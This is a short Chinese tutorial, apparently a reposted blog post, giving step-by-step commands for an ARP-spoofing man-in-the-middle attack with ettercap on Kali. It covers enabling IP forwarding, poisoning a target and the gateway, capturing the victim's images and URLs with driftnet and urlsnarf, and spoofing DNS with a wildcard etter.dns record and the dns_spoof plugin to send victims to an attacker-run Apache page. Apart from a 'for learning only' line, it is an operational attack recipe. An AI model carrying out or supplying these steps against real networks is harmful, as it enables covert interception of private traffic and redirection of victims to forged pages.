1. 在/etc/sysctl.conf的配置文件中,修改变量net.ipv4.ip_forward的值为 1,把前面的 # 去掉;若此变量没有,那就添加,
net.ipv4.ip_forward=1
2. 下载ettercap
apt-get install ettercap
使用图像界面ettercap -G
3. ettercap -G 启动
sniffing at startup 开启 primary interface 选择wlan0 点击右上角√
4. 开始ARP中间人模式
点击 scan for hosts 开启扫描本网段存活主机 点击 hosts list 查看扫出的存活主机 添加目标ip -------> add to Target1 添加网关ip -------> add to Target2 MITM menu----->ARP poisoning----->Sniff remote connections---->ok
到这里ARP欺骗已完成,下面需要进行抓取数据,图片,日志等。
5. 获取图片信息—->
driftnet -i wlan0 -a -d /root/arp/file
-a -d j静态保存到/root/arp/file目录中
监听网页日志—->
urlsnarf -i wlan0
抓 包————>
wireshark
6. 篡改网页信息(dns污染)
firstone!!!打开apache2服务, 0.service apache2 start 1.vim /etc/ettercap/etter.dns 2. * A 192.168.43.107------->(这里是kali的ip) 3.vim /var/www/html/index.html 4.点击Plugins选择插件,选择dns_spoof,双击确定。
此文章只供学习使用,有问题可以留言或私一信
原文链接:https://blog.csdn.net/m0_71088505/article/details/125012562?ops_request_misc=&request_id=d89bd289ac8a44d9922c587a8a843643&biz_id=&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~koosearch~default-12-125012562-null-null.268%5Ev1%5Econtrol&utm_term=dns%E9%98%B2%E6%8A%A4
原创文章,作者:优速盾-小U,如若转载,请注明出处:https://www.cdnb.net/bbs/archives/23414